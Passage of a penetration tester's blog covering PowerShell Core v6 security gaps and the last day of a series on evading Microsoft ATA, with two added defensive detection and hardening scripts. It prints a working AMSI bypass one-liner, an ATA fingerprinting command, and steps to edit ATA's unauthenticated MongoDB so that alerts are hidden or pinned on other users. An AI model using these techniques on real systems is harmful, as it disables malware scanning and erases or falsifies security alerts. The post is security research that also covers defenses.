<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivPQvl8gKPZIgOMjaZWsI42EuU9J8SCYx5C_zrgtcH5CigVilVgvi_PG4T5NMlbc6ZeS4osKMlTelWrKAaxjfxkDJzVIL7UThUZtHwFH2CYRFZ8bwQ7buBKcJcqc-bOEJODJH6dA4GBZc/s1600/v5_falsepositive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1260" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivPQvl8gKPZIgOMjaZWsI42EuU9J8SCYx5C_zrgtcH5CigVilVgvi_PG4T5NMlbc6ZeS4osKMlTelWrKAaxjfxkDJzVIL7UThUZtHwFH2CYRFZ8bwQ7buBKcJcqc-bOEJODJH6dA4GBZc/s400/v5_falsepositive.png" width="400" /></a></div>
But in the case of v6, the above is not logged unless there is a proper use of "GetMembers".<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd1RtSl_b2AXqqzIcCUHCF2Mzy3uRz6iOzvoQZv4VS2WchyIqxBkoD7EIG-Vy-rkuXZMQfw_-glgPm6czny9EcrpFWt0nHGLsEFu9tXryN474_pkBduHWtciRG054clPTD5pJRRQF8Cg/s1600/v6_truepositive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="590" height="327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd1RtSl_b2AXqqzIcCUHCF2Mzy3uRz6iOzvoQZv4VS2WchyIqxBkoD7EIG-Vy-rkuXZMQfw_-glgPm6czny9EcrpFWt0nHGLsEFu9tXryN474_pkBduHWtciRG054clPTD5pJRRQF8Cg/s400/v6_truepositive.png" width="400" /></a></div>
I find this very interesting and will have an in-depth look at it later on. Maybe it could lead to some interesting findings.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
AntiMalware Scan Interface (AMSI)</h3>
<div style="text-align: justify;">
AMSI provides the content of a script or script block to the registered antivirus before execution takes place. This enables the antivirus to detect known bad scripts and script blocks regardless of the input method (disk, memory, manual), and even encoded and obfuscated scripts. I spoke about AMSI at BlackHat USA 2016 and did a <a href="http://www.labofapenetrationtester.com/2016/09/amsi.html">detailed blog post</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Fortunately, AMSI is enabled for PowerShell v6 as well, although <a href="https://twitter.com/mattifestation/status/735261176745988096">Matt's bypass</a> still works with just a minor modification. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)
</textarea></pre>
But, once again, since it still increases the cost to an attacker, it's great to have AMSI in v6.<br />
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: left;">
Constrained Language Mode</h3>
<div style="text-align: justify;">
If "Allow mode" is enforced for Applocker or Device Guard, PowerShell is automatically restricted to Constrained Language Mode, which restricts access to the Windows API, interaction with COM etc. See <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes?view=powershell-5.1">Language Modes</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
That is not the case with v6!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKNHBjwutIjGEzkYA2qXcc6aGl7mDPmZZdkEceh4Qj-B35bKPsEsxEHQV3ptZMdGS3lrIHC0dBa9_wEjQLDcVVT457q3-envgYnM8Ztu_Y8g84ZeXNLHMuke7VuoDKBlu2TEVqlg11W7U/s1600/PowerShellv6_LanguageMode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="1069" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKNHBjwutIjGEzkYA2qXcc6aGl7mDPmZZdkEceh4Qj-B35bKPsEsxEHQV3ptZMdGS3lrIHC0dBa9_wEjQLDcVVT457q3-envgYnM8Ztu_Y8g84ZeXNLHMuke7VuoDKBlu2TEVqlg11W7U/s400/PowerShellv6_LanguageMode.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
<h3>
Introducing the PowerShell Upgrade Attack</h3>
</div>
<div style="text-align: justify;">
The PowerShell downgrade attack is popular with red teams. If you can run PowerShell v2, ALL the security measures we have seen are bypassed, as v2 simply doesn't support them. Lee provided <a href="http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/">an excellent guide</a> on how to detect and prevent such attacks. If v2 is blocked or the required .NET version is not installed, what to do? Simply run <b>pwsh</b> from your PowerShell session and you will drop into a new PowerShell session (v6, if installed) which has minimal security features compared to v5/5.1. I am calling it the <b>PowerShell Upgrade Attack</b> <b>:P</b>. On a serious note, please keep in mind that Windows PowerShell - with enhanced logging - is the default on Windows. Also, v6 is not an update; it needs to be installed separately. Windows PowerShell and PowerShell Core can be installed on a single machine and both will work independently. <br />
<br />
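Lee's downgrade guide keys on the engine version in the Windows PowerShell logs, which the "upgrade" path above never touches. The following is an added example (not from the post, not a PowerShell Team script) of the signals a defender still has on a host: whether pwsh.exe is installed at all, pwsh.exe launches in the Security log with their parent process, and the Warning-level script block events from both the Microsoft-Windows-PowerShell/Operational log (4104) and the PowerShellCore log (4103, as described in the Script Block Logging section). It assumes process creation auditing with command line logging is enabled and that RegisterManifest.ps1 has been run; the PowerShellCore/Operational log name is as seen on a 6.0 test host.<br />

```powershell
# Added example, not from the original post: the traces left when someone moves
# from Windows PowerShell 5.1 to PowerShell Core 6 on the same host. Run elevated.

function Get-InstalledPwsh {
    # Core is a side-by-side install, so first know whether pwsh.exe exists at all.
    Get-ChildItem -Path "$env:ProgramFiles\PowerShell" -Filter pwsh.exe -Recurse -ErrorAction SilentlyContinue |
        Select-Object FullName, @{ n = 'Version'; e = { $_.VersionInfo.ProductVersion } }
}

function Get-PwshLaunches {
    param([int]$Hours = 24)
    # Event 4688 carries the process names only in its XML data, so read them from there.
    # pwsh.exe whose parent is powershell.exe is exactly the "upgrade" described above.
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data.NewProcessName -like '*\pwsh.exe') {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $data.SubjectUserName
                Parent      = $data.ParentProcessName
                CommandLine = $data.CommandLine
                FromWinPS   = ($data.ParentProcessName -like '*\powershell.exe')
            }
        }
    }
}

function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # Windows PowerShell: automatic Warning-level script block logging, Event ID 4104.
    # PowerShell Core: the same detections land in the PowerShellCore log as 4103.
    $sources = @(
        @{ Log = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
        @{ Log = 'PowerShellCore/Operational';               Id = 4103 }
    )
    foreach ($s in $sources) {
        # Level 3 = Warning, which leaves out the Verbose entries when full logging is on.
        $filter = @{ LogName = $s.Log; Id = $s.Id; Level = 3; StartTime = $since }
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            $text = $_.Message -replace '\s+', ' '
            [pscustomobject]@{
                Time = $_.TimeCreated
                Log  = $s.Log
                Text = $text.Substring(0, [Math]::Min(160, $text.Length))
            }
        }
    }
}

Get-InstalledPwsh          | Format-Table -AutoSize
Get-PwshLaunches           | Format-Table -AutoSize
Get-SuspiciousScriptBlocks | Format-Table -AutoSize -Wrap
```

If the first function returns nothing, the host has no v6 to "upgrade" into and the rest is moot; if it does, a pwsh.exe launch with FromWinPS set to true is the row to investigate, and an empty PowerShellCore section on such a host more likely means the provider was never registered than that nothing happened.<br />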
<h3>
So, what next?</h3>
I hold the PowerShell Team in high regard (for creating such a useful tool, being open to criticism and acting on feedback) and am quite confident (and hopeful) that they will address these shortcomings soon. Jeffrey already <a href="https://twitter.com/jsnover/status/951118940293414912">tweeted that</a> Constrained Language Mode will be fixed in 6.1. But if your production environment is working fine with Windows PowerShell v5/5.1, I would not advise installing v6 on any system (at least not the production ones). </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
UPDATE (25-Jan-2018) - <a href="https://blogs.msdn.microsoft.com/powershell/2018/01/24/powershell-core-6-1-roadmap/">The PowerShell Core Roadmap is published</a> and there is no mention of bringing Core logging to parity with Windows PowerShell 5.1. Thankfully, the Device Guard/Applocker policy enforcement will get fixed. <br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-73434302248951410472017-08-11T21:30:00.000+05:302018-05-03T22:15:43.942+05:30Week of Evading Microsoft ATA - Day 5 - Attacking ATA, Closing thoughts and Microsoft's response<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
This is Day 5 of the Week of Evading Microsoft ATA. The week has been split into the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b>Day 5 - Attacking ATA deployment, limitations of research and mitigation</b><br />
<div>
<br />
</div>
<div>
Welcome to the last day of the Week of Evading ATA. We have seen how ATA can be bypassed and avoided during a security assessment. Today let's see how an ATA deployment itself can be attacked. We will also discuss the limitations of the research against ATA, some closing thoughts and some general mitigations against AD attacks. </div>
<div>
<br /></div>
<div>
<b>Attacking ATA</b></div>
<div>
<br />
<b>Find ATA Installation</b></div>
<div>
So how do we spot ATA? Before 1.8, it was possible to simply run banner grabbing against web services on port 443 and look for "Microsoft Advanced Threat Analytics". An example PowerShell command for this:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};(New-Object Net.Webclient).DownloadString('https://IPAddr').Contains('Microsoft Advanced Threat Analytics')
</textarea></pre>
</div>
<div>
But ATA 1.8 uses Single Sign-On and it is not possible to grab the banner without authentication. But we are not out of options. We can simply look at the certificate used by the ATA console. By default, the ATA console uses a self-signed certificate issued to "ATACenter".</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_lUpfh_W6GYEOE5fAddZwjrZDg2FpL6pJT4KG_fOPyBg_4jGeF5pQej-OFLA5h8B-Elw9qtycPYDzDHgM8pGasFlVFllZUwkK5pMb9a_v9JE2yKZY0k0e7a4NpnP1gTnt95XTaoMKTA/s1600/ATA-Certificate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="747" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_lUpfh_W6GYEOE5fAddZwjrZDg2FpL6pJT4KG_fOPyBg_4jGeF5pQej-OFLA5h8B-Elw9qtycPYDzDHgM8pGasFlVFllZUwkK5pMb9a_v9JE2yKZY0k0e7a4NpnP1gTnt95XTaoMKTA/s400/ATA-Certificate.png" width="373" /></a></div>
ATA uses the local users and groups of the ATA Center; the ATA documentation <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-role-groups">suggests</a> having three role groups: ATA Administrators, ATA Users and ATA Viewers. If the target deployment uses the exact same group names as suggested, we should be able to find ATA by enumerating local groups on machines in the domain using PowerView:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-NetLocalGroup -ComputerName ata-center -GroupName "ATA Administrators"</textarea></pre>
Also, I am quite sure that smart folks out there (like from nmap or metasploit) will soon include ATA in their service identification.</div>
<div>
<br />
<b>Admin Access</b><br />
Once we know that there is an ATA deployment in a domain, we may try attacking it. There are a number of interesting things which can be done with it. If the ATA Center is part of the target domain and we have escalated privileges to domain admin, or have local admin access to the Center, we can have much fun. ATA subscribes to the concept of "if it's admin, it's game over". By default, all members of the local Administrators group (local admins, domain admins) on the ATA Center have administrative access to the ATA console. With that access we can resolve alerts, add exclusions, enumerate honey tokens etc.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxC0gnso-8-P0ZjjKrC9NVper_qYym1dlr1gIUQFcnh0_rkCMCH-BhjJfwTeB_5XHrEZib_vKRtl5lNmNLbCdWBEMCwy3J6htQsBIhLnKp8HsOQhkruTBF93JhMiKFC_VRS9yMb_Uy6TE/s1600/Exclusions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxC0gnso-8-P0ZjjKrC9NVper_qYym1dlr1gIUQFcnh0_rkCMCH-BhjJfwTeB_5XHrEZib_vKRtl5lNmNLbCdWBEMCwy3J6htQsBIhLnKp8HsOQhkruTBF93JhMiKFC_VRS9yMb_Uy6TE/s400/Exclusions.png" width="400" /></a></div>
While this is nothing earth-shattering, since ATA specifically targets domain dominance and lateral movement, having the ability to add exceptions for our IP, users and attacks is very useful.<br />
<br />
<b>Backend MongoDB</b><br />
<br />
The ATA Center uses MongoDB to store entities, entity profiles, Kerberos requests, suspicious activities and more. It listens only on localhost but needs no authentication to connect to! This means that if we have administrative access to the ATA Center we can do very interesting things. Let's see two of them:<br />
<br />
<b>Tampering with alerts</b><br />
Let's say we want to tamper with the suspicious activities from our foothold user, say labuser. Let's first look up the SourceAccountId for labuser in the UniqueEntity collection. I am using <a href="https://robomongo.org/download">RoboMongo</a> for accessing the MongoDB:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">db.getCollection('UniqueEntity').find({"Name" : "lab user"})</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4FRHmtOEx0_nlEO0DRkc5tqUYALbfICkVEijEpyT1oEE26ndPMUaBG-quUDDMFUo6OCb1u9Oyfb3nge-ekBUniHeHzuQEeU7bZu0i99oo6EU3KO3Bn-_AMOd_UqlPwyAzH7DWSWYubro/s1600/labuser_id_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="1600" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4FRHmtOEx0_nlEO0DRkc5tqUYALbfICkVEijEpyT1oEE26ndPMUaBG-quUDDMFUo6OCb1u9Oyfb3nge-ekBUniHeHzuQEeU7bZu0i99oo6EU3KO3Bn-_AMOd_UqlPwyAzH7DWSWYubro/s400/labuser_id_1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Once we have the id of our account, let's have a look in the SuspiciousActivity collection for alerts for our user:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: black; color: white;">db.getCollection('SuspiciousActivity').find({"DetailsRecords.SourceAccountId" : "bf2a6a4f-03bb-4d79-a5a1-9eea52e726f1"})</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwOpUHfeP71L6zmdh_hzPQfi-aS0764Aqyc-3LfhXnKM1EqmOWTHtmLqgx9pRRGr6AGQ01MhE274G3ApUlozdDX51Lk5poIRw3NPxXgkgNd56ShyphenhyphenE0VO_-4GTNoGDFWJ6Pdx3V1DhA5g/s1600/labuser_activities.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="496" data-original-width="1239" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwOpUHfeP71L6zmdh_hzPQfi-aS0764Aqyc-3LfhXnKM1EqmOWTHtmLqgx9pRRGr6AGQ01MhE274G3ApUlozdDX51Lk5poIRw3NPxXgkgNd56ShyphenhyphenE0VO_-4GTNoGDFWJ6Pdx3V1DhA5g/s320/labuser_activities.png" width="320" /></a></div>
Let's have a look at the latest suspicious activity for labuser:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUjwvM0NgnV8xQ5v_Ub8RJjcjuqkpZOUbE4A3Ls3PBM9Tzbfz4jlCTkt-HXhbj44JXn8DAnz8dORroj2O6WMpU8dHZ3gD7cQ7SKmBwpOwzqoE9w1kMfRa5gAgbbNoKht7QLGLoRJbFg9M/s1600/Abnormal_Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="883" data-original-width="909" height="387" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUjwvM0NgnV8xQ5v_Ub8RJjcjuqkpZOUbE4A3Ls3PBM9Tzbfz4jlCTkt-HXhbj44JXn8DAnz8dORroj2O6WMpU8dHZ3gD7cQ7SKmBwpOwzqoE9w1kMfRa5gAgbbNoKht7QLGLoRJbFg9M/s400/Abnormal_Protocol.png" width="400" /></a></div>
An unusual protocol alert, most probably an overpass-the-hash. Going by the time stamp and other details, this is the alert in the ATA console:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjitHyoOVmV3aL4MGJtuV8Xid04lPUNuxTURxDmAfSq9FJBQ9vyGEKeevjp09V3OzGPvvtf6W7TJOXOjSbd-nn91suT6x9_fKgnwOa0DwvJBwk3kLck2_Hn59kTohTqQLoy0SXwADaNjJc/s1600/ATA_Alert_Abnormal_Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="745" data-original-width="1244" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjitHyoOVmV3aL4MGJtuV8Xid04lPUNuxTURxDmAfSq9FJBQ9vyGEKeevjp09V3OzGPvvtf6W7TJOXOjSbd-nn91suT6x9_fKgnwOa0DwvJBwk3kLck2_Hn59kTohTqQLoy0SXwADaNjJc/s400/ATA_Alert_Abnormal_Protocol.png" width="400" /></a></div>
Now, we can simply look up the id of another user, say termadmin, and substitute it by editing the SourceAccountId for that particular alert in the SuspiciousActivity collection. Let's do it not only for labuser but for the other two users in the above alert as well, for the sake of demonstration:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOHA2tkBHnOXbsw9vS6W7oMtHlny8v4b4larRcSA9vfxq14qR5Bt2VHUldkE-uj8TtWfs5sHg62t7A1pxpSmsWyxGT7O6Z-phpr6FZ7DiCYVFKk6J932Fy21eYeDy53U9A9QF7Ti3YfVw/s1600/ATA_Alert_Abnormal_Protocol_Modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="746" data-original-width="1234" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOHA2tkBHnOXbsw9vS6W7oMtHlny8v4b4larRcSA9vfxq14qR5Bt2VHUldkE-uj8TtWfs5sHg62t7A1pxpSmsWyxGT7O6Z-phpr6FZ7DiCYVFKk6J932Fy21eYeDy53U9A9QF7Ti3YfVw/s400/ATA_Alert_Abnormal_Protocol_Modified.png" width="400" /></a></div>
Sweet, isn't it :D<br />
<br />
We can do the same for computers as well, to "frame" some other computer for attacks like malicious replication of directory services and so on.<br />
<br />
<b>Hiding the alerts</b><br />
Let's say we simply want to hide an alert. Entries in the SuspiciousActivity collection have a property called "IsVisible". Set it to false and the alert vanishes from the console. Let's go after the latest DCSync alert:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiV6pr6tnt9sqAB0ae59axwMsiHc6ZYXV08CZi0-hlUHwwwxlmqLD94eERJzCIpEtjSg8VeziwFmvhDTYktcXK42IkWJNZ4qi5FprCy7h_FDMoZXU74fi4g8WtpFRtiHJTAW_zpL_zne8/s1600/DCSync_Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="597" data-original-width="1317" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiV6pr6tnt9sqAB0ae59axwMsiHc6ZYXV08CZi0-hlUHwwwxlmqLD94eERJzCIpEtjSg8VeziwFmvhDTYktcXK42IkWJNZ4qi5FprCy7h_FDMoZXU74fi4g8WtpFRtiHJTAW_zpL_zne8/s400/DCSync_Detection.png" width="400" /></a></div>
Let's look for "TitleKey" : "DirectoryServicesReplicationSuspiciousActivityTitle" in the SuspiciousActivity collection and edit the latest one to change "IsVisible" : true to "IsVisible" : false:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl0geU_vHKcK2NGzjRqVPeFTFnLiejYAWJR_fjVy5UsbdaJpaq0pyg22WpuNRJ8IfHVYhgbDbnXG6t23HpEI3KXu60rbHGZqEUvbClQOf7HXXdDgChrvaNu5MHGf8Ff_Hkal-6rG6CKjk/s1600/DCSync_Edit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="570" data-original-width="974" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl0geU_vHKcK2NGzjRqVPeFTFnLiejYAWJR_fjVy5UsbdaJpaq0pyg22WpuNRJ8IfHVYhgbDbnXG6t23HpEI3KXu60rbHGZqEUvbClQOf7HXXdDgChrvaNu5MHGf8Ff_Hkal-6rG6CKjk/s400/DCSync_Edit.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And the result is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhssD55IDEmTAbaS2MrauIJpuhvf-WCH7e2yqlvmOtdlOBvF-wBDWUjoO6K2n4IchnWeatOG6W9pvkOF0NVsSeuq3I0EiXLNOFEy0ePX14Ibd9n2ZnyMtWa3yuvYSyYzVMs0GyUFVb58kc/s1600/DCSybc_NoAlert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1287" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhssD55IDEmTAbaS2MrauIJpuhvf-WCH7e2yqlvmOtdlOBvF-wBDWUjoO6K2n4IchnWeatOG6W9pvkOF0NVsSeuq3I0EiXLNOFEy0ePX14Ibd9n2ZnyMtWa3yuvYSyYzVMs0GyUFVb58kc/s400/DCSybc_NoAlert.png" width="400" /></a></div>
Nice! This helps in covering tracks in a post-DA lateral movement scenario.<br />
<br />
Of course, no surprise: we modified the database and the console displays the modified values. But as these are security alerts, having access to just one box - the ATA Center - drastically reduces the security posture of the entire organisation.<br />
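A hardening check for the three things this section shows an intruder leaning on, added here as an example and not part of the original post or of ATA: run it on the ATA Center itself to confirm the console certificate is no longer the default self-signed "ATACenter" one, to review who sits in the local Administrators group (every member is an ATA administrator) and in the documented role groups, and to confirm the MongoDB listener is bound to loopback only. The role group names follow the documentation linked above, and port 27017 is the MongoDB default rather than a value from the post; both are assumptions to adjust for your deployment.<br />

```powershell
# Added example, not from the original post: audit the ATA Center for the
# fingerprint, the admin surface and the database exposure described above.
# Run elevated on the ATA Center (Windows PowerShell 5.1 or later).

function Test-AtaConsoleCertificate {
    # A certificate issued to CN=ATACenter that is also its own issuer is the
    # default self-signed one, which identifies the deployment from the network.
    Get-ChildItem -Path Cert:\LocalMachine\My |
        Where-Object { $_.Subject -like '*CN=ATACenter*' } |
        ForEach-Object {
            $selfSigned = ($_.Subject -eq $_.Issuer)
            [pscustomobject]@{
                Check      = 'Console certificate'
                Thumbprint = $_.Thumbprint
                SelfSigned = $selfSigned
                Advice     = if ($selfSigned) { 'Replace with a certificate from your internal CA' } else { 'OK' }
            }
        }
}

function Get-AtaConsoleAdmins {
    # Local Administrators get full console rights by default; this list should be
    # short and should not contain broad groups such as Domain Admins.
    # Role group names are the documented defaults (assumption; edit to match yours).
    foreach ($g in 'Administrators', 'ATA Administrators', 'ATA Users', 'ATA Viewers') {
        Get-LocalGroupMember -Name $g -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{ Group = $g; Member = $_.Name; Type = $_.ObjectClass }
        }
    }
}

function Test-MongoListener {
    # The database needs no credentials, so any bind other than loopback would
    # expose it to the network. 27017 is the MongoDB default (assumption).
    param([int]$Port = 27017)
    Get-NetTCPConnection -State Listen -LocalPort $Port -ErrorAction SilentlyContinue | ForEach-Object {
        $loopback = $_.LocalAddress -in '127.0.0.1', '::1'
        [pscustomobject]@{
            Check        = 'MongoDB listener'
            Address      = $_.LocalAddress
            LoopbackOnly = $loopback
            Advice       = if ($loopback) { 'OK, but any local admin can still reach it' } else { 'Bound to a routable address; restrict to localhost' }
        }
    }
}

Test-AtaConsoleCertificate | Format-Table -AutoSize
Get-AtaConsoleAdmins       | Format-Table -AutoSize
Test-MongoListener         | Format-Table -AutoSize
```

Loopback binding is the expected state, so the finding that matters is usually the second table: because a local admin can rewrite alerts at will, the ATA Center has to be treated as a Tier 0 asset alongside the domain controllers, which is the point of the privileged access guidance linked in the Defences section.<br />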
<br />
<b>Limitations of the research</b><br />
Copy paste from my BlackHat slides:<br />
- Focus of all the bypasses is on Anomaly based detections.<br />
- Many behavior based detections could not be replicated in the lab and are more powerful and useful in a real environment.<br />
- Behavior based detection may detect lateral movement even if the anomaly based detection is bypassed – use the avoidance techniques (Day 4) in such cases.<br />
<div>
<br /></div>
<b>Evading ATA forever</b><br />
What happens when the bypasses we discussed are fixed? We modify our methods and techniques. I have seen fellow red teamers using Golden Ticket or Skeleton Key just to brag about it in their reports. No matter how frustrating they are, we as good attackers need to focus on the goals of the assessment. Not only does it help in meeting those deadlines, it also helps in avoiding pesky detection mechanisms ;) For example, there is no need to go for DA if the goal of the assessment can be completed without it. Stay focused!<br />
<br />
<b>Defences</b><br />
More from my BlackHat slides:<br />
<div style="text-align: justify;">
- ATA, even if it can't detect anomalies, provides interesting insight into the traffic exchanged with the Domain Controller. Use that to detect the attackers. </div>
<div style="text-align: justify;">
- Limit your DAs to login only to Domain Controllers. Remember prevention is better than cure. </div>
<br />
<div style="text-align: justify;">
- Implement possible architectural changes suggested here: <a href="https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access">https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access</a></div>
<div>
<br /></div>
<b>Microsoft's Response</b><br />
Microsoft's ATA team is awesome! They contacted me (and MSRC contacted me as well) when my talk was scheduled and we worked together to understand and address each other's concerns. I always found them very open to the idea that research like this actually makes a product better. It was actually fun exchanging ideas with them!<br />
<br />
That is all for the week of Evading Microsoft ATA. Hope you enjoyed it as much as I enjoyed writing it :) Please leave questions, feedback and comments :)<br />
<br />
<br />
<br /></div>
</div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-80393542415922981362017-08-11T21:29:00.000+05:302018-05-03T22:15:43.989+05:30Week of Evading Microsoft ATA - Day 4 - Silver ticket, Kerberoast and SQL Servers<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
This is Day 4 of Week of Evading Microsoft ATA. The week has been split into the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b>Day 4 - Bypasses/avoidance by reducing conversation with the DC</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b><br />
<b><br />
</b> Day 4 is dedicated to those attacks which need minimal, normal-looking communication with the domain controller and thus with ATA. That is, after bypassing ATA on the first three days, today we will discuss how ATA can be avoided altogether.<br />
<br />
<b>Silver Ticket</b><br />
<b><br />
